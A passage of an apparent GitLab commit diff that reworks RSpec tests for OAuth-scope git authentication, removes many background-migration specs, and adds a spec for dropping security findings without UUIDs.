token_w_api_scope.token, project: nil, ip: 'ip')) + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') + + expect(gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip')) .to have_attributes(auth_failure) end end - it 'succeeds for OAuth tokens with the `api` scope' do - expect(gl_auth.find_for_git_client("oauth2", token_w_api_scope.token, project: nil, ip: 'ip')).to have_attributes(actor: user, project: nil, type: :oauth, authentication_abilities: described_class.full_authentication_abilities) - end + context 'with specified scopes' do + using RSpec::Parameterized::TableSyntax + + where(:scopes, :abilities) do + 'api' | described_class.full_authentication_abilities + 'read_api' | described_class.read_only_authentication_abilities + 'read_repository' | [:download_code] + 'write_repository' | [:download_code, :push_code] + 'read_user' | [] + 'sudo' | [] + 'openid' | [] + 'profile' | [] + 'email' | [] + end - it 'fails for OAuth tokens with other scopes' do - token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'read_user') + with_them do + it 'authenticates with correct abilities' do + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: scopes) - expect(gl_auth.find_for_git_client("oauth2", token.token, project: nil, ip: 'ip')).to have_attributes(auth_failure) + expect(gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip')) + .to have_attributes(actor: user, project: nil, type: :oauth, authentication_abilities: abilities) + end + end end it 'does not try password auth before oauth' do + access_token = Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') + expect(gl_auth).not_to receive(:find_with_user_password) - gl_auth.find_for_git_client("oauth2", token_w_api_scope.token, project: nil, ip: 'ip') + gl_auth.find_for_git_client("oauth2", access_token.token, project: nil, ip: 'ip') end context 'blocked user' do diff --git a/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb b/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb deleted file mode 100644 index 1e72b249c19..00000000000 --- a/spec/lib/gitlab/background_migration/add_merge_request_diff_commits_count_spec.rb +++ /dev/null @@ -1,66 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::AddMergeRequestDiffCommitsCount do - let(:namespaces_table) { table(:namespaces) } - let(:projects_table) { table(:projects) } - let(:merge_requests_table) { table(:merge_requests) } - let(:merge_request_diffs_table) { table(:merge_request_diffs) } - let(:merge_request_diff_commits_table) { table(:merge_request_diff_commits) } - - let(:namespace) { namespaces_table.create!(name: 'gitlab-org', path: 'gitlab-org') } - let(:project) { projects_table.create!(name: 'gitlab', path: 'gitlab-org/gitlab-ce', namespace_id: namespace.id) } - let(:merge_request) do - merge_requests_table.create!(target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: 'mr name') - end - - def create_diff!(name, commits: 0) - mr_diff = merge_request_diffs_table.create!( - merge_request_id: merge_request.id) - - commits.times do |i| - merge_request_diff_commits_table.create!( - merge_request_diff_id: mr_diff.id, - relative_order: i, sha: i) - end - - mr_diff - end - - describe '#perform' do - it 'migrates diffs that have no commits' do - diff = create_diff!('with_multiple_commits', commits: 0) - - subject.perform(diff.id, diff.id) - - expect(diff.reload.commits_count).to eq(0) - end - - it 'skips diffs that have commits_count already set' do - timestamp = 2.days.ago - diff = merge_request_diffs_table.create!( - merge_request_id: merge_request.id, - commits_count: 0, - updated_at: timestamp) - - subject.perform(diff.id, diff.id) - - expect(diff.reload.updated_at).to be_within(1.second).of(timestamp) - end - - it 'migrates multiple diffs to the correct values' do - diffs = Array.new(3).map.with_index { |_, i| create_diff!(i, commits: 3) } - - subject.perform(diffs.first.id, diffs.last.id) - - diffs.each do |diff| - expect(diff.reload.commits_count).to eq(3) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb b/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb deleted file mode 100644 index 0b29163671c..00000000000 --- a/spec/lib/gitlab/background_migration/add_modified_to_approval_merge_request_rule_spec.rb +++ /dev/null @@ -1,61 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::AddModifiedToApprovalMergeRequestRule, schema: 20181228175414 do - let(:determine_if_rules_are_modified) { described_class.new } - - let(:namespace) { table(:namespaces).create!(name: 'gitlab', path: 'gitlab') } - let(:projects) { table(:projects) } - let(:normal_project) { projects.create!(namespace_id: namespace.id) } - let(:overridden_project) { projects.create!(namespace_id: namespace.id) } - let(:rules) { table(:approval_merge_request_rules) } - let(:project_rules) { table(:approval_project_rules) } - let(:sources) { table(:approval_merge_request_rule_sources) } - let(:merge_requests) { table(:merge_requests) } - let(:groups) { table(:namespaces) } - let(:mr_groups) { table(:approval_merge_request_rules_groups) } - let(:project_groups) { table(:approval_project_rules_groups) } - - before do - project_rule = project_rules.create!(project_id: normal_project.id, approvals_required: 3, name: 'test rule') - overridden_project_rule = project_rules.create!(project_id: overridden_project.id, approvals_required: 5, name: 'other test rule') - overridden_project_rule_two = project_rules.create!(project_id: overridden_project.id, approvals_required: 7, name: 'super cool rule') - - merge_request = merge_requests.create!(target_branch: 'feature', source_branch: 'default', source_project_id: normal_project.id, target_project_id: normal_project.id) - overridden_merge_request = merge_requests.create!(target_branch: 'feature-2', source_branch: 'default', source_project_id: overridden_project.id, target_project_id: overridden_project.id) - - merge_rule = rules.create!(merge_request_id: merge_request.id, approvals_required: 3, name: 'test rule') - overridden_merge_rule = rules.create!(merge_request_id: overridden_merge_request.id, approvals_required: 6, name: 'other test rule') - overridden_merge_rule_two = rules.create!(merge_request_id: overridden_merge_request.id, approvals_required: 7, name: 'super cool rule') - - sources.create!(approval_project_rule_id: project_rule.id, approval_merge_request_rule_id: merge_rule.id) - sources.create!(approval_project_rule_id: overridden_project_rule.id, approval_merge_request_rule_id: overridden_merge_rule.id) - sources.create!(approval_project_rule_id: overridden_project_rule_two.id, approval_merge_request_rule_id: overridden_merge_rule_two.id) - - group1 = groups.create!(name: "group1", path: "test_group1", type: 'Group') - group2 = groups.create!(name: "group2", path: "test_group2", type: 'Group') - group3 = groups.create!(name: "group3", path: "test_group3", type: 'Group') - - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group1.id) - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group2.id) - project_groups.create!(approval_project_rule_id: overridden_project_rule_two.id, group_id: group3.id) - - mr_groups.create!(approval_merge_request_rule_id: overridden_merge_rule.id, group_id: group1.id) - mr_groups.create!(approval_merge_request_rule_id: overridden_merge_rule_two.id, group_id: group2.id) - end - - describe '#perform' do - it 'changes the correct rules' do - original_count = rules.all.count - - determine_if_rules_are_modified.perform(rules.minimum(:id), rules.maximum(:id)) - - results = rules.where(modified_from_project_rule: true) - - expect(results.count).to eq 2 - expect(results.collect(&:name)).to eq(['other test rule', 'super cool rule']) - expect(rules.count).to eq original_count - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb b/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb deleted file mode 100644 index 1404ada3647..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_deployment_clusters_from_deployments_spec.rb +++ /dev/null @@ -1,44 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillDeploymentClustersFromDeployments, :migration, schema: 20181228175414 do - subject { described_class.new } - - describe '#perform' do - it 'backfills deployment_cluster for all deployments in the given range with a non-null cluster_id' do - deployment_clusters = table(:deployment_clusters) - - namespace = table(:namespaces).create!(name: 'the-namespace', path: 'the-path') - project = table(:projects).create!(name: 'the-project', namespace_id: namespace.id) - environment = table(:environments).create!(name: 'the-environment', project_id: project.id, slug: 'slug') - cluster = table(:clusters).create!(name: 'the-cluster') - - deployment_data = { cluster_id: cluster.id, project_id: project.id, environment_id: environment.id, ref: 'abc', tag: false, sha: 'sha', status: 1 } - expected_deployment_1 = create_deployment(**deployment_data) - create_deployment(**deployment_data, cluster_id: nil) # no cluster_id - expected_deployment_2 = create_deployment(**deployment_data) - out_of_range_deployment = create_deployment(**deployment_data, cluster_id: cluster.id) # expected to be out of range - - # to test "ON CONFLICT DO NOTHING" - existing_record_for_deployment_2 = deployment_clusters.create!( - deployment_id: expected_deployment_2.id, - cluster_id: expected_deployment_2.cluster_id, - kubernetes_namespace: 'production' - ) - - subject.perform(expected_deployment_1.id, out_of_range_deployment.id - 1) - - expect(deployment_clusters.all.pluck(:deployment_id, :cluster_id, :kubernetes_namespace)).to contain_exactly( - [expected_deployment_1.id, cluster.id, nil], - [expected_deployment_2.id, cluster.id, existing_record_for_deployment_2.kubernetes_namespace] - ) - end - - def create_deployment(**data) - @iid ||= 0 - @iid += 1 - table(:deployments).create!(iid: @iid, **data) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb b/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb deleted file mode 100644 index 9194525e713..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_environment_id_deployment_merge_requests_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillEnvironmentIdDeploymentMergeRequests, schema: 20181228175414 do - let(:environments) { table(:environments) } - let(:merge_requests) { table(:merge_requests) } - let(:deployments) { table(:deployments) } - let(:deployment_merge_requests) { table(:deployment_merge_requests) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - subject(:migration) { described_class.new } - - it 'correctly backfills environment_id column' do - namespace = namespaces.create!(name: 'foo', path: 'foo') - project = projects.create!(namespace_id: namespace.id) - - production = environments.create!(project_id: project.id, name: 'production', slug: 'production') - staging = environments.create!(project_id: project.id, name: 'staging', slug: 'staging') - - mr = merge_requests.create!(source_branch: 'x', target_branch: 'master', target_project_id: project.id) - - deployment1 = deployments.create!(environment_id: staging.id, iid: 1, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - deployment2 = deployments.create!(environment_id: production.id, iid: 2, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - deployment3 = deployments.create!(environment_id: production.id, iid: 3, project_id: project.id, ref: 'master', tag: false, sha: '123abcdef', status: 1) - - # mr is tracked twice in production through deployment2 and deployment3 - deployment_merge_requests.create!(deployment_id: deployment1.id, merge_request_id: mr.id) - deployment_merge_requests.create!(deployment_id: deployment2.id, merge_request_id: mr.id) - deployment_merge_requests.create!(deployment_id: deployment3.id, merge_request_id: mr.id) - - expect(deployment_merge_requests.where(environment_id: nil).count).to eq(3) - - migration.backfill_range(1, mr.id) - - expect(deployment_merge_requests.where(environment_id: nil).count).to be_zero - expect(deployment_merge_requests.count).to eq(2) - - production_deployments = deployment_merge_requests.where(environment_id: production.id) - expect(production_deployments.count).to eq(1) - expect(production_deployments.first.deployment_id).to eq(deployment2.id) - - expect(deployment_merge_requests.where(environment_id: staging.id).count).to eq(1) - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb b/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb deleted file mode 100644 index d33f52514da..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_merge_request_cleanup_schedules_spec.rb +++ /dev/null @@ -1,53 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillMergeRequestCleanupSchedules, schema: 20181228175414 do - let(:merge_requests) { table(:merge_requests) } - let(:cleanup_schedules) { table(:merge_request_cleanup_schedules) } - let(:metrics) { table(:merge_request_metrics) } - - let(:namespace) { table(:namespaces).create!(name: 'name', path: 'path') } - let(:project) { table(:projects).create!(namespace_id: namespace.id) } - - subject { described_class.new } - - describe '#perform' do - let!(:open_mr) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master') } - - let!(:closed_mr_1) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - let!(:closed_mr_2) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - let!(:closed_mr_1_metrics) { metrics.create!(merge_request_id: closed_mr_1.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - let!(:closed_mr_2_metrics) { metrics.create!(merge_request_id: closed_mr_2.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - let!(:closed_mr_2_cleanup_schedule) { cleanup_schedules.create!(merge_request_id: closed_mr_2.id, scheduled_at: Time.current) } - - let!(:merged_mr_1) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 3) } - let!(:merged_mr_2) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 3, updated_at: Time.current) } - let!(:merged_mr_1_metrics) { metrics.create!(merge_request_id: merged_mr_1.id, target_project_id: project.id, merged_at: Time.current, created_at: Time.current, updated_at: Time.current) } - - let!(:closed_mr_3) { merge_requests.create!(target_project_id: project.id, source_branch: 'master', target_branch: 'master', state_id: 2) } - let!(:closed_mr_3_metrics) { metrics.create!(merge_request_id: closed_mr_3.id, target_project_id: project.id, latest_closed_at: Time.current, created_at: Time.current, updated_at: Time.current) } - - it 'creates records for all closed and merged merge requests in range' do - expect(Gitlab::BackgroundMigration::Logger).to receive(:info).with( - message: 'Backfilled merge_request_cleanup_schedules records', - count: 3 - ) - - subject.perform(open_mr.id, merged_mr_2.id) - - aggregate_failures do - expect(cleanup_schedules.all.pluck(:merge_request_id)) - .to contain_exactly(closed_mr_1.id, closed_mr_2.id, merged_mr_1.id, merged_mr_2.id) - expect(cleanup_schedules.find_by(merge_request_id: closed_mr_1.id).scheduled_at.to_s) - .to eq((closed_mr_1_metrics.latest_closed_at + 14.days).to_s) - expect(cleanup_schedules.find_by(merge_request_id: closed_mr_2.id).scheduled_at.to_s) - .to eq(closed_mr_2_cleanup_schedule.scheduled_at.to_s) - expect(cleanup_schedules.find_by(merge_request_id: merged_mr_1.id).scheduled_at.to_s) - .to eq((merged_mr_1_metrics.merged_at + 14.days).to_s) - expect(cleanup_schedules.find_by(merge_request_id: merged_mr_2.id).scheduled_at.to_s) - .to eq((merged_mr_2.updated_at + 14.days).to_s) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb b/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb deleted file mode 100644 index 0f8adca2ca4..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb +++ /dev/null @@ -1,23 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillNamespaceSettings, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:namespace_settings) { table(:namespace_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - - subject { described_class.new } - - describe '#perform' do - it 'creates settings for all projects in range' do - namespaces.create!(id: 5, name: 'test1', path: 'test1') - namespaces.create!(id: 7, name: 'test2', path: 'test2') - namespaces.create!(id: 8, name: 'test3', path: 'test3') - - subject.perform(5, 7) - - expect(namespace_settings.all.pluck(:namespace_id)).to contain_exactly(5, 7) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb b/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb deleted file mode 100644 index e6b0db2ab73..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb +++ /dev/null @@ -1,24 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillProjectSettings, schema: 20181228175414 do - let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - let(:project) { projects.create!(namespace_id: namespace.id) } - - subject { described_class.new } - - describe '#perform' do - it 'creates settings for all projects in range' do - projects.create!(id: 5, namespace_id: namespace.id) - projects.create!(id: 7, namespace_id: namespace.id) - projects.create!(id: 8, namespace_id: namespace.id) - - subject.perform(5, 7) - - expect(project_settings.all.pluck(:project_id)).to contain_exactly(5, 7) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb b/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb deleted file mode 100644 index 3468df3dccd..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb +++ /dev/null @@ -1,32 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillPushRulesIdInProjects, :migration, schema: 20181228175414 do - let(:push_rules) { table(:push_rules) } - let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - - subject { described_class.new } - - describe '#perform' do - it 'creates new project push_rules for all push rules in the range' do - project_1 = projects.create!(id: 1, namespace_id: namespace.id) - project_2 = projects.create!(id: 2, namespace_id: namespace.id) - project_3 = projects.create!(id: 3, namespace_id: namespace.id) - project_settings_1 = project_settings.create!(project_id: project_1.id) - project_settings_2 = project_settings.create!(project_id: project_2.id) - project_settings_3 = project_settings.create!(project_id: project_3.id) - push_rule_1 = push_rules.create!(id: 5, is_sample: false, project_id: project_1.id) - push_rule_2 = push_rules.create!(id: 6, is_sample: false, project_id: project_2.id) - push_rules.create!(id: 8, is_sample: false, project_id: 3) - - subject.perform(5, 7) - - expect(project_settings_1.reload.push_rule_id).to eq(push_rule_1.id) - expect(project_settings_2.reload.push_rule_id).to eq(push_rule_2.id) - expect(project_settings_3.reload.push_rule_id).to be_nil - end - end -end diff --git a/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb b/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb new file mode 100644 index 00000000000..7cc64889fc8 --- /dev/null +++ b/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::DropInvalidSecurityFindings, schema: 20211108211434 do + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let(:project) { table(:projects).create!(namespace_id: namespace.id) } + + let(:pipelines) { table(:ci_pipelines) } + let!(:pipeline) { pipelines.create!(project_id: project.id) } + + let(:ci_builds) { table(:ci_builds) } + let!(:ci_build) { ci_builds.create! } + + let(:security_scans) { table(:security_scans) } + let!(:security_scan) do + security_scans.create!( + scan_type: 1, + status: 1, + build_id: ci_build.id, + project_id: project.id, + pipeline_id: pipeline.id + ) + end + + let(:vulnerability_scanners) { table(:vulnerability_scanners) } + let!(:vulnerability_scanner) { vulnerability_scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + + let(:security_findings) { table(:security_findings) } + let!(:security_finding_without_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: nil + ) + end + + let!(:security_finding_with_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: 'bd95c085-71aa-51d7-9bb6-08ae669c262e' + ) + end + + let(:sub_batch_size) { 10_000 } + + subject { described_class.new.perform(security_finding_without_uuid.id, security_finding_with_uuid.id, sub_batch_size) } + + it 'drops Security::Finding objects with no UUID' do + expect { subject }.to change(security_findings, :count).from(2).to(1) + end +end diff --git a/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb b/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb deleted file mode 100644 index 35ec8be691a..00000000000 --- a/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb +++ /dev/null @@ -1,49 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixPromotedEpicsDiscussionIds, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:epics) { table(:epics) } - let(:notes) { table(:notes) } - - let(:user) { users.create!(email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:epic1) { epics.create!(id: 1, author_id: user.id, iid: 1, group_id: namespace.id, title: 'Epic with discussion', title_html: 'Epic with discussion') } - - def create_note(discussion_id) - notes.create!(note: 'note comment', - noteable_id: epic1.id, - noteable_type: 'Epic', - discussion_id: discussion_id) - end - - def expect_valid_discussion_id(id) - expect(id).to match(/\A\h{40}\z/) - end - - describe '#perform with batch of discussion ids' do - it 'updates discussion ids' do - note1 = create_note('00000000') - note2 = create_note('00000000') - note3 = create_note('10000000') - - subject.perform(%w(00000000 10000000)) - - expect_valid_discussion_id(note1.reload.discussion_id) - expect_valid_discussion_id(note2.reload.discussion_id) - expect_valid_discussion_id(note3.reload.discussion_id) - expect(note1.discussion_id).to eq(note2.discussion_id) - expect(note1.discussion_id).not_to eq(note3.discussion_id) - end - - it 'skips notes with discussion id not in range' do - note4 = create_note('20000000') - - subject.perform(%w(00000000 10000000)) - - expect(note4.reload.discussion_id).to eq('20000000') - end - end -end diff --git a/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb b/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb deleted file mode 100644 index 95509f9b897..00000000000 --- a/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb +++ /dev/null @@ -1,104 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixUserNamespaceNames, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:user) { users.create!(name: "The user's full name", projects_limit: 10, username: 'not-null', email: '1') } - - context 'updating the namespace names' do - it 'updates a user namespace within range' do - user2 = users.create!(name: "Other user's full name", projects_limit: 10, username: 'also-not-null', email: '2') - user_namespace1 = namespaces.create!( - id: 2, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - user_namespace2 = namespaces.create!( - id: 3, - owner_id: user2.id, - name: "Should also be the user's name", - path: user.username - ) - - described_class.new.perform(1, 5) - - expect(user_namespace1.reload.name).to eq("The user's full name") - expect(user_namespace2.reload.name).to eq("Other user's full name") - end - - it 'does not update namespaces out of range' do - user_namespace = namespaces.create!( - id: 6, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_namespace.reload.name } - end - - it 'does not update groups owned by the users' do - user_group = namespaces.create!( - id: 2, - owner_id: user.id, - name: 'A group name', - path: 'the-path', - type: 'Group' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_group.reload.name } - end - end - - context 'namespace route names' do - let(:routes) { table(:routes) } - let(:namespace) do - namespaces.create!( - id: 2, - owner_id: user.id, - name: "Will be updated to the user's name", - path: user.username - ) - end - - it "updates the route name if it didn't match the namespace" do - route = routes.create!(path: namespace.path, name: 'Incorrect name', source_type: 'Namespace', source_id: namespace.id) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name") - end - - it 'updates the route name if it was nil match the namespace' do - route = routes.create!(path: namespace.path, name: nil, source_type: 'Namespace', source_id: namespace.id) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name") - end - - it "doesn't update group routes" do - route = routes.create!(path: 'group-path', name: 'Group name', source_type: 'Group', source_id: namespace.id) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it "doesn't touch routes for namespaces out of range" do - user_namespace = namespaces.create!( - id: 6, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_namespace.reload.name } - end - end -end diff --git a/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb b/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb deleted file mode 100644 index b4444df674e..00000000000 --- a/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb +++ /dev/null @@ -1,98 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixUserProjectRouteNames, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:routes) { table(:routes) } - let(:projects) { table(:projects) } - - let(:user) { users.create!(name: "The user's full name", projects_limit: 10, username: 'not-null', email: '1') } - - let(:namespace) do - namespaces.create!( - owner_id: user.id, - name: "Should eventually be the user's name", - path: user.username - ) - end - - let(:project) do - projects.create!(namespace_id: namespace.id, name: 'Project Name') - end - - it "updates the route for a project if it did not match the user's name" do - route = routes.create!( - id: 1, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name / Project Name") - end - - it 'updates the route for a project if the name was nil' do - route = routes.create!( - id: 1, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: nil - ) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name / Project Name") - end - - it 'does not update routes that were are out of the range' do - route = routes.create!( - id: 6, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it 'does not update routes for projects in groups owned by the user' do - group = namespaces.create!( - owner_id: user.id, - name: 'A group', - path: 'a-path', - type: '' - ) - project = projects.create!(namespace_id: group.id, name: 'Project Name') - route = routes.create!( - id: 1, - path: "#{group.path}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it 'does not update routes for namespaces' do - route = routes.create!( - id: 1, - path: namespace.path, - source_id: namespace.id, - source_type: 'Namespace', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end -end diff --git a/spec/lib/gitlab/background_migration/job_coordinator_spec.rb b/spec/lib/gitlab/background_migration/job_coordinator_spec.rb index a0543ca9958..7a524d1489a 100644 --- a/spec/lib/gitlab/background_migration/job_coordinator_spec.rb +++ b/spec/lib/gitlab/background_migration/job_coordinator_spec.rb @@ -3,32 +3,22 @@ require 'spec_helper' RSpec.describe Gitlab::BackgroundMigration::JobCoordinator do - let(:database) { :main } let(:worker_class) { BackgroundMigrationWorker } - let(:coordinator) { described_class.new(database, worker_class) } + let(:tracking_database) { worker_class.tracking_database } + let(:coordinator) { described_class.new(worker_class) } - describe '.for_database' do + describe '.for_tracking_database' do it 'returns an executor with the correct worker class and database' do - coordinator = described_class.for_database(database) + coordinator = described_class.for_tracking_database(tracking_database) - expect(coordinator.database).to eq(database) expect(coordinator.worker_class).to eq(worker_class) end - context 'when passed in as a string' do - it 'retruns an executor with the correct worker class and database' do - coordinator = described_class.for_database(database.to_s) - - expect(coordinator.database).to eq(database) - expect(coordinator.worker_class).to eq(worker_class) - end - end - context 'when an invalid value is given' do it 'raises an error' do expect do - described_class.for_database('notvalid') - end.to raise_error(ArgumentError, "database must be one of [main], got 'notvalid'") + described_class.for_tracking_database('notvalid') + end.to raise_error(ArgumentError, /tracking_database must be one of/) end end end diff --git a/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb b/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb deleted file mode 100644 index 64e8afedf52..00000000000 --- a/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb +++ /dev/null @@ -1,113 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::LinkLfsObjectsProjects, :migration, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:fork_networks) { table(:fork_networks) } - let(:fork_network_members) { table(:fork_network_members) } - let(:lfs_objects) { table(:lfs_objects) } - let(:lfs_objects_projects) { table(:lfs_objects_projects) } - - let(:namespace) { namespaces.create!(name: 'GitLab', path: 'gitlab') } - - let(:fork_network) { fork_networks.create!(root_project_id: source_project.id) } - let(:another_fork_network) { fork_networks.create!(root_project_id: another_source_project.id) } - - let(:source_project) { projects.create!(namespace_id: namespace.id) } - let(:another_source_project) { projects.create!(namespace_id: namespace.id) } - let(:project) { projects.create!(namespace_id: namespace.id) } - let(:another_project) { projects.create!(namespace_id: namespace.id) } - let(:partially_linked_project) { projects.create!(namespace_id: namespace.id) } - let(:fully_linked_project) { projects.create!(namespace_id: namespace.id) } - - let(:lfs_object) { lfs_objects.create!(oid: 'abc123', size: 100) } - let(:another_lfs_object) { lfs_objects.create!(oid: 'def456', size: 200) } - - let!(:source_project_lop_1) do - lfs_objects_projects.create!( - lfs_object_id: lfs_object.id, - project_id: source_project.id - ) - end - - let!(:source_project_lop_2) do - lfs_objects_projects.create!( - lfs_object_id: another_lfs_object.id, - project_id: source_project.id - ) - end - - let!(:another_source_project_lop_1) do - lfs_objects_projects.create!( - lfs_object_id: lfs_object.id, - project_id: another_source_project.id - ) - end - - let!(:another_source_project_lop_2) do - lfs_objects_projects.create!( - lfs_object_id: another_lfs_object.id, - project_id: another_source_project.id - ) - end - - before do - stub_const("#{described_class}::BATCH_SIZE", 2) - - # Create links between projects - fork_network_members.create!(fork_network_id: fork_network.id, project_id: source_project.id, forked_from_project_id: nil) - - [project, partially_linked_project, fully_linked_project].each do |p| - 